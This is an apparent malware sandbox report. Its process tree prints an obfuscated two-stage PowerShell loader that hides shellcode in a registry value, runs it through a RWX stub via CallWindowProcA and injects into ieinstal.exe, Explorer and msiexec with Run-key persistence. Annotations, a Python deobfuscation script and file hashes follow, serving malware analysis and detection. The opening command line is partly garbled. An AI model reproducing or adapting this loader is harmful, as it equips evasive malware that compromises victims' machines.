DV7SDd3KDSBT9S0UFE7 DP0KCDA DUBSC CNDE1EC E EMDlDUBPCCCOCK8 DU7LD DTD BMC D 9U0CFF3eD F CFC C DRDA6CDtFPD 2 EB3E8 4U8 4DFD9 DuBpCDASF A DbB DK2 D B DA9 D FACAA D B F 8MD 1 C C FH8 CSBHD 0IDDDLCGA DB7 D 1MD 0SE E D 1GD 7 Di0BC AID BCCTCa9B6 9 6DD 8EDU5ECPEZ9EES9HA FP1 CI8VDtBPC CmDGD D 6TDTFRD 0 DT0OD BNDC2F9JEA9WALEUD D 1 C 8NC DJDLB CADADH5BD B D BOD 0S9S7B9 2S9FE 9 6PF 9DF AOE AE9WE FHES9 6 E 
5kFC7 D 0ZCTA EEESCUA C C ED3R9 2 9 E EH5PFD7SDE0WC ARE E CFA CRC EN3 9 2D9 EBES5kFE7 DT0vCDAEEOE C AeC CBEt3 9U2L9 E E 5 FL7DDF0GCDA E E CAADCLC E 3 9 2B9BEGE 5IF 7SDI0FCtAFEmEKC AEC CLEC3O9P7S9TEA9D6CE 5OFS7cDI0 CTADEmEnCLANCRCLE 3S9A7E9S7U9 7E' ;S&L( `$SFSo ruuCdUi nldSt aHgPeFtR7 ) u`$ ABl uAm n eOr s 2 ; `$ A lKuAmsnGedrTsP3B O= JBPeFtDaRtDeCsKtBe rWn e sD4 1K0J W'L9 ADF 4 DL1KDC0ED 7 CODDDSBGC C D 7BDL0 DS9GD BpCYC 9D0DFU7 D 0RCB8 D 1RDL5 D B 9 6 9DA FSCADZB CdD DS5 CCCFDF7bD 0 D 9 D BDCVCP8SDn9S2D9UA FUFBCHB CNCHD B D 0 D B 9T2C9NASF 4TDQ1HC DPD 7 D 0KDTF 9 2 8 EW9 2L8SES9V7P'F; &E(C`$TF oSr uDdDi nCdStHaHgOe tR7T)I G`$MA lBuKmFnFeSrBs 3F# ;""";;Function Alumners9 { param([String]$Ryatppes); For($Nedsivningsanlgs=1; $Nedsivningsanlgs -lt $Ryatppes.Length-1; $Nedsivningsanlgs+=(1+1)){ $Betatesternes41 = $Betatesternes41 + $Ryatppes.Substring($Nedsivningsanlgs, 1); } $Betatesternes41;}$Gynecocracy0 = Alumners9 ' F F K a N M T D T B S D S M F S H AIBE XF ';$Gynecocracy1= Alumners9 $Laryngologi;if([IntPtr]::size -eq 4+4){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Gynecocracy1 ;}else{.$Gynecocracy0 $Gynecocracy1;}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 524
The readable tail of this command line (after the triple quote that closes the obfuscated block) is the decoder: Alumners9 keeps every second character of the blob, and if([IntPtr]::size -eq 4+4) relaunches the result through the globbed path $env:windir\S*64\W*Power*\v1.0\*ll.exe, i.e. the 32-bit SysWOW64 powershell.exe, whenever the host is 64-bit. That is why the next stage is 32-bit and the hollowed host is the 32-bit ieinstal.exe under Program Files (x86).
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Betatesternes410 { param([String]$Ryatppes); $myzontes = New-Object byte[] ($Ryatppes.Length / 2); For($Nedsivningsanlgs=0; $Nedsivningsanlgs -lt $Ryatppes.Length; $Nedsivningsanlgs+=2){ $Passionerede = $Ryatppes.Substring($Nedsivningsanlgs, 2); $myzontes[$Nedsivningsanlgs/2] = [convert]::ToByte($Passionerede, 16); $myzontes[$Nedsivningsanlgs/2] = ($myzontes[$Nedsivningsanlgs/2] -bxor 190); } [String][System.Text.Encoding]::ASCII.GetString($myzontes);}$Adjunctly0=Betatesternes410 'EDC7CDCADBD390DAD2D2';$Adjunctly1=Betatesternes410 'F3D7DDCCD1CDD1D8CA90E9D7D08D8C90EBD0CDDFD8DBF0DFCAD7C8DBF3DBCAD6D1DACD';$Adjunctly2=Betatesternes410 'F9DBCAEECCD1DDFFDADACCDBCDCD';$Adjunctly3=Betatesternes410 'EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F6DFD0DAD2DBECDBD8';$Adjunctly4=Betatesternes410 'CDCACCD7D0D9';$Adjunctly5=Betatesternes410 'F9DBCAF3D1DACBD2DBF6DFD0DAD2DB';$Adjunctly6=Betatesternes410 'ECEAEDCEDBDDD7DFD2F0DFD3DB929EF6D7DADBFCC7EDD7D9929EEECBDCD2D7DD';$Adjunctly7=Betatesternes410 'ECCBD0CAD7D3DB929EF3DFD0DFD9DBDA';$Adjunctly8=Betatesternes410 'ECDBD8D2DBDDCADBDAFADBD2DBD9DFCADB';$Adjunctly9=Betatesternes410 'F7D0F3DBD3D1CCC7F3D1DACBD2DB';$Forudindtaget0=Betatesternes410 'F3C7FADBD2DBD9DFCADBEAC7CEDB';$Forudindtaget1=Betatesternes410 'FDD2DFCDCD929EEECBDCD2D7DD929EEDDBDFD2DBDA929EFFD0CDD7FDD2DFCDCD929EFFCBCAD1FDD2DFCDCD';$Forudindtaget2=Betatesternes410 'F7D0C8D1D5DB';$Forudindtaget3=Betatesternes410 'EECBDCD2D7DD929EF6D7DADBFCC7EDD7D9929EF0DBC9EDD2D1CA929EE8D7CCCACBDFD2';$Forudindtaget4=Betatesternes410 'E8D7CCCACBDFD2FFD2D2D1DD';$Forudindtaget5=Betatesternes410 'D0CADAD2D2';$Forudindtaget6=Betatesternes410 'F0CAEECCD1CADBDDCAE8D7CCCACBDFD2F3DBD3D1CCC7';$Forudindtaget7=Betatesternes410 'F7FBE6';$Forudindtaget8=Betatesternes410 'E2';$Overchannel=Betatesternes410 'EBEDFBEC8D8C';$Sovseskeen=Betatesternes410 
'FDDFD2D2E9D7D0DAD1C9EECCD1DDFF';function fkp {Param ($Skolemestererer68, $Skiderik) ;$Judicative0 =Betatesternes410 '9AF7DACCD7D8CACDCACADBD2CDDBD08F878A9E839E96E5FFCECEFAD1D3DFD7D0E38484FDCBCCCCDBD0CAFAD1D3DFD7D090F9DBCAFFCDCDDBD3DCD2D7DBCD96979EC29EE9D6DBCCDB93F1DCD4DBDDCA9EC59E9AE190F9D2D1DCDFD2FFCDCDDBD3DCD2C7FDDFDDD6DB9E93FFD0DA9E9AE190F2D1DDDFCAD7D1D090EDCED2D7CA969AF8D1CCCBDAD7D0DACADFD9DBCA8697E5938FE390FBCFCBDFD2CD969AFFDAD4CBD0DDCAD2C78E979EC39790F9DBCAEAC7CEDB969AFFDAD4CBD0DDCAD2C78F97';&($Forudindtaget7) $Judicative0;$Judicative5 = Betatesternes410 '9AFDD1D0CADFD7D0DBCCD6DFC8D0DB9E839E9AF7DACCD7D8CACDCACADBD2CDDBD08F878A90F9DBCAF3DBCAD6D1DA969AFFDAD4CBD0DDCAD2C78C929EE5EAC7CEDBE5E3E39EFE969AFFDAD4CBD0DDCAD2C78D929E9AFFDAD4CBD0DDCAD2C78A9797';&($Forudindtaget7) $Judicative5;$Judicative1 = Betatesternes410 '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';&($Forudindtaget7) $Judicative1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Unprincipledly18,[Parameter(Position = 1)] [Type] $Alfarytme = [Void]);$Judicative2 = Betatesternes410 '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';&($Forudindtaget7) $Judicative2;$Judicative3 = Betatesternes410 '9AD0CBD1C8D190FADBD8D7D0DBFDD1D0CDCACCCBDDCAD1CC969AFFDAD4CBD0DDCAD2C788929EE5EDC7CDCADBD390ECDBD8D2DBDDCAD7D1D090FDDFD2D2D7D0D9FDD1D0C8DBD0CAD7D1D0CDE38484EDCADFD0DADFCCDA929E9AEBD0CECCD7D0DDD7CED2DBDAD2C78F869790EDDBCAF7D3CED2DBD3DBD0CADFCAD7D1D0F8D2DFD9CD969AFFDAD4CBD0DDCAD2C78997';&($Forudindtaget7) $Judicative3;$Judicative4 = Betatesternes410 '9AD0CBD1C8D190FADBD8D7D0DBF3DBCAD6D1DA969AF8D1CCCBDAD7D0DACADFD9DBCA8C929E9AF8D1CCCBDAD7D0DACADFD9DBCA8D929E9AFFD2D8DFCCC7CAD3DB929E9AEBD0CECCD7D0DDD7CED2DBDAD2C78F869790EDDBCAF7D3CED2DBD3DBD0CADFCAD7D1D0F8D2DFD9CD969AFFDAD4CBD0DDCAD2C78997';&($Forudindtaget7) $Judicative4;$Judicative5 = Betatesternes410 'CCDBCACBCCD09E9AD0CBD1C8D190FDCCDBDFCADBEAC7CEDB9697';&($Forudindtaget7) $Judicative5 ;}$Biografierne = Betatesternes410 
'D5DBCCD0DBD28D8C';$Judicative6 = Betatesternes410 '9AEECBD3CEDBCCD0DBCD9E839EE5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484F9DBCAFADBD2DBD9DFCADBF8D1CCF8CBD0DDCAD7D1D0EED1D7D0CADBCC9696D8D5CE9E9AFCD7D1D9CCDFD8D7DBCCD0DB9E9AF8D1CCCBDAD7D0DACADFD9DBCA8A97929E96F9FAEA9EFE96E5F7D0CAEECACCE3929EE5EBF7D0CA8D8CE3929EE5EBF7D0CA8D8CE3929EE5EBF7D0CA8D8CE3979E96E5F7D0CAEECACCE3979797';&($Forudindtaget7) $Judicative6;$Josina = fkp $Forudindtaget5 $Forudindtaget6;$Judicative7 = Betatesternes410 '9AFCDBCDD5CCD7D0D9DBCC8D9E839E9AEECBD3CEDBCCD0DBCD90F7D0C8D1D5DB96E5F7D0CAEECACCE38484E4DBCCD1929E888B8E929E8EC68D8E8E8E929E8EC68A8E97';&($Forudindtaget7) $Judicative7;$Judicative8 = Betatesternes410 '9AFFCBCCDBD0DB9E839E9AEECBD3CEDBCCD0DBCD90F7D0C8D1D5DB96E5F7D0CAEECACCE38484E4DBCCD1929E878D888D86888B88929E8EC68D8E8E8E929E8EC68A97';&($Forudindtaget7) $Judicative8;$Beskringer00='HKCU:\ahorntrerne\Soldebror';$Beskringer01 =Betatesternes410 '9AFFD2CBD3D0DBCCCD8396F9DBCA93F7CADBD3EECCD1CEDBCCCAC79E93EEDFCAD69E9AFCDBCDD5CCD7D0D9DBCC8E8E9790DBC6CACCDFCED1D2DFCADB';&($Forudindtaget7) $Beskringer01;$Judicative9 = Betatesternes410 '9AF4CBDAD7DDDFCAD7C8DB9E839EE5EDC7CDCADBD390FDD1D0C8DBCCCAE38484F8CCD1D3FCDFCDDB888AEDCACCD7D0D9969AFFD2CBD3D0DBCCCD97';&($Forudindtaget7) $Judicative9;$Alumners0 = Betatesternes410 'E5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484FDD1CEC7969AF4CBDAD7DDDFCAD7C8DB929E8E929E9E9AFCDBCDD5CCD7D0D9DBCC8D929E888B8E97';&($Forudindtaget7) $Alumners0;$Omtumlet=$Judicative.count-650;$Alumners1 = Betatesternes410 'E5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484FDD1CEC7969AF4CBDAD7DDDFCAD7C8DB929E888B8E929E9AFFCBCCDBD0DB929E9AF1D3CACBD3D2DBCA97';&($Forudindtaget7) $Alumners1;$Alumners2 = Betatesternes410 
'9AF4D1D0D7CDDBCCD7D0D9DBCC9E839EE5EDC7CDCADBD390ECCBD0CAD7D3DB90F7D0CADBCCD1CEEDDBCCC8D7DDDBCD90F3DFCCCDD6DFD2E38484F9DBCAFADBD2DBD9DFCADBF8D1CCF8CBD0DDCAD7D1D0EED1D7D0CADBCC9696D8D5CE9E9AF1C8DBCCDDD6DFD0D0DBD29E9AEDD1C8CDDBCDD5DBDBD097929E96F9FAEA9EFE96E5F7D0CAEECACCE3929EE5F7D0CAEECACCE3929EE5F7D0CAEECACCE3929EE5F7D0CAEECACCE3929EE5F7D0CAEECACCE3979E96E5F7D0CAEECACCE3979797';&($Forudindtaget7) $Alumners2;$Alumners3 = Betatesternes410 '9AF4D1D0D7CDDBCCD7D0D9DBCC90F7D0C8D1D5DB969AFCDBCDD5CCD7D0D9DBCC8D929AFFCBCCDBD0DB929AF4D1CDD7D0DF928E928E97';&($Forudindtaget7) $Alumners3#"4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 836
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe" 5⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID: 1728
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe" 2⤵
- Adds policy Run key to start application
- Blocklisted process makes network request
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 1540
This msiexec.exe is a child of Explorer.EXE (depth 2, a sibling of WScript.exe rather than a descendant of the script chain) and was started with no arguments. Together with the SetThreadContext from ieinstal.exe (1728) into Explorer.EXE (1204) and the WriteProcessMemory from 1204 into 1540, this is the injected code running inside Explorer starting a fresh host for the next stage.

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe" 3⤵
PID: 988
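The SysWOW64 powershell.exe command line above (stage 2) hides every string behind Betatesternes410, which hex-decodes its argument and XORs each byte with 190 (0xBE); the stage-1 command line hides its script behind Alumners9, which keeps every second character. The decoder below is an added example, not code from the sandbox or from the sample, and it runs on assignment lines copied verbatim from the stage-2 command line on this page. Applied to those lines it yields System.dll, Microsoft.Win32.UnsafeNativeMethods and GetProcAddress (the GetProcAddress-through-reflection trick), the API names VirtualAlloc, ntdll!NtProtectVirtualMemory and USER32!CallWindowProcA, and the two allocation calls: a 650-byte buffer at PAGE_EXECUTE_READWRITE (0x40) and a 93638656-byte buffer at PAGE_READWRITE (0x4), both MEM_COMMIT|MEM_RESERVE (0x3000). Decoding the remaining strings the same way shows the script reading a base64 blob from HKCU:\ahorntrerne\Soldebror value extrapolate, copying its first 650 bytes into the RWX stub and the remainder into the RW buffer, and entering the stub through CallWindowProcA with the RW buffer and the NtProtectVirtualMemory address as arguments, which executes the shellcode without any CreateThread call. The layer-1 test string is constructed, because the extraction collapsed runs of spaces in the stage-1 command line and the junk/real character parity can no longer be recovered from this page.

```python
"""Decoder for the two string-obfuscation layers used by the PowerShell stages
in this report.  Added example: not code from the sandbox or from the sample.

Layer 1 (stage 1, the `Alumners9` function): one junk character is interleaved
before every real character; the loop starts at index 1 and steps by 2.
Layer 2 (stage 2, the `Betatesternes410` function): the argument is a hex
string; each byte is XORed with 190 (0xBE) and the result is read as ASCII.
"""
import re

XOR_KEY = 0xBE  # `-bxor 190` in Betatesternes410
PAGE_EXECUTE_READWRITE = 0x40
PAGE_READWRITE = 0x04

# Assignment lines copied verbatim from the SysWOW64 powershell.exe command
# line in the process tree above.  Only the short API/name strings and the
# three lines that allocate and call into the buffers are included.
STAGE2_EXCERPT = (
    "$Adjunctly0=Betatesternes410 'EDC7CDCADBD390DAD2D2';"
    "$Adjunctly1=Betatesternes410 'F3D7DDCCD1CDD1D8CA90E9D7D08D8C90EBD0CDDFD8DBF0DFCAD7C8DBF3DBCAD6D1DACD';"
    "$Adjunctly2=Betatesternes410 'F9DBCAEECCD1DDFFDADACCDBCDCD';"
    "$Forudindtaget4=Betatesternes410 'E8D7CCCACBDFD2FFD2D2D1DD';"
    "$Forudindtaget5=Betatesternes410 'D0CADAD2D2';"
    "$Forudindtaget6=Betatesternes410 'F0CAEECCD1CADBDDCAE8D7CCCACBDFD2F3DBD3D1CCC7';"
    "$Forudindtaget7=Betatesternes410 'F7FBE6';"
    "$Overchannel=Betatesternes410 'EBEDFBEC8D8C';"
    "$Sovseskeen=Betatesternes410 'FDDFD2D2E9D7D0DAD1C9EECCD1DDFF';"
    "$Biografierne = Betatesternes410 'D5DBCCD0DBD28D8C';"
    "$Judicative7 = Betatesternes410 '9AFCDBCDD5CCD7D0D9DBCC8D9E839E9AEECBD3CEDBCCD0DBCD90F7D0C8D1D5DB96E5F7D0CAEECACCE38484E4DBCCD1929E888B8E929E8EC68D8E8E8E929E8EC68A8E97';"
    "$Judicative8 = Betatesternes410 '9AFFCBCCDBD0DB9E839E9AEECBD3CEDBCCD0DBCD90F7D0C8D1D5DB96E5F7D0CAEECACCE38484E4DBCCD1929E878D888D86888B88929E8EC68D8E8E8E929E8EC68A97';"
    "$Alumners3 = Betatesternes410 '9AF4D1D0D7CDDBCCD7D0D9DBCC90F7D0C8D1D5DB969AFCDBCDD5CCD7D0D9DBCC8D929AFFCBCCDBD0DB929AF4D1CDD7D0DF928E928E97';"
)

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*Betatesternes410\s+'([0-9A-Fa-f]+)'")
ALLOC_RE = re.compile(
    r"Invoke\(\[IntPtr\]::Zero,\s*(\d+),\s*(0x[0-9A-Fa-f]+),\s*(0x[0-9A-Fa-f]+)\)")


def strip_interleaved_junk(s: str) -> str:
    """Layer 1: keep s[1], s[3], s[5], ... exactly as Alumners9 does."""
    return s[1::2]


def xor_hex_decode(hexstr: str, key: int = XOR_KEY) -> str:
    """Layer 2: hex pairs XORed with the key.  A wrong key almost always
    produces a non-ASCII byte, so the decode error doubles as a sanity check."""
    return bytes(b ^ key for b in bytes.fromhex(hexstr)).decode("ascii")


def decode_stage2(script: str) -> dict:
    """Map every `$name = Betatesternes410 '<hex>'` in `script` to its plaintext,
    in source order."""
    return {name: xor_hex_decode(hx) for name, hx in ASSIGN_RE.findall(script)}


def virtualalloc_calls(decoded: dict) -> list:
    """(size, allocation_type, protect) for each decoded
    `$x = $y.Invoke([IntPtr]::Zero, size, type, prot)` line, i.e. each
    VirtualAlloc made through the reflected delegate."""
    calls = []
    for text in decoded.values():
        m = ALLOC_RE.search(text)
        if m:
            calls.append((int(m.group(1)), int(m.group(2), 16), int(m.group(3), 16)))
    return calls


if __name__ == "__main__":
    decoded = decode_stage2(STAGE2_EXCERPT)
    for name, text in decoded.items():
        print(f"{name:15} -> {text}")
    for size, kind, prot in virtualalloc_calls(decoded):
        role = ("RWX stub, entered via CallWindowProcA" if prot == PAGE_EXECUTE_READWRITE
                else "RW buffer for the rest of the blob")
        print(f"VirtualAlloc(NULL, {size}, {kind:#x}, {prot:#x})  # {role}")
```

decode_stage2 takes any text containing those assignments, so it can be pointed at the full command line from a process-creation log rather than the excerpt above; the same regex with a different function name and key covers other samples of this loader, whose per-sample changes are the identifier names and the XOR constant, not the scheme.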
Network
MITRE ATT&CK Enterprise v6
Downloads

(path not given in this extract)
  Filesize: 61KB
  MD5: e71c8443ae0bc2e282c73faead0a6dd3
  SHA1: 0c110c1b01e68edfacaeae64781a37b1995fa94b
  SHA256: 95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
  SHA512: b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5: 5b1e521a9838e012df009e51fa1ac60b
  SHA1: 94a27c491edb06c910c9d7a9d6288d7f1767e78e
  SHA256: e6745b945cb1c1ff3a5f7b4b6c70f12bf5eb9ffc733d44ffb1f8c7561bf3098f
  SHA512: ce80df269aece40aadb41032434fb8c21c6b8fc0ae170d13feb9e5d53fd861e499d6e8f1a5708a206c84506e01e4518d7a3819f79d451d15b1ffbec3bba0567c
  CryptoAPI URL-cache metadata written during certificate/CRL retrieval; a side effect of the network activity, not a payload.

(path not given in this extract; identical hashes to the 61KB file above, listed a second time in the report)
  Filesize: 61KB
  MD5: e71c8443ae0bc2e282c73faead0a6dd3
  SHA1: 0c110c1b01e68edfacaeae64781a37b1995fa94b
  SHA256: 95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
  SHA512: b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

(path not given in this extract)
  Filesize: 444KB
  MD5: d71848944418c67f6eb230682f9a969a
  SHA1: 11d37a0eccbaf9995c6b236ff1a99d174a2566bd
  SHA256: efff0464180fcb34ec33e7835086ea58adc84bc3f0b08a7323ef1d58b258e59e
  SHA512: 7baef376fb5f87e43124f79f81fe45567b7926be277a05abbbfe74bdbbe8dc49c238999e432fb4c457dff23ca78915d2a899bdde9a2ee79b77c655c17ebe706d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TXZV7S6ZQM7CK5FAZ0M5.temp
  Filesize: 7KB
  MD5: f815cae08d83ae982d0fef8887550029
  SHA1: 4b06ccc65130f5140525dc6b99f1986292a850ef
  SHA256: e36036835807757aad8018868f4ae8f08eddc483a04c8eab330e1d1c50c2dc79
  SHA512: 10d6de33aa2bf6564b95b056026af71873ba289b10b22b6eb2451185a14ba8e467c624908100992575ca263c945d2e2725c3d7a72e11617329604b80fe0c1acd
  Jump-list temp file, typically a by-product of the PowerShell console host starting; not a payload.

(path not given in this extract)
  Filesize: 849KB
  MD5: 87f9e5a6318ac1ec5ee05aa94a919d7a
  SHA1: 7a9956e8de89603dba99772da29493d3fd0fe37d
  SHA256: 7705b87603e0d772e1753441001fcf1ac2643ee41bf14a8177de2c056628665c
  SHA512: c45c03176142918e34f746711e83384572bd6a8ed0a005600aa4a18cf22eade06c76eda190b37db49ec1971c4649e086affd19eee108c5f405df27c0c8cb23d2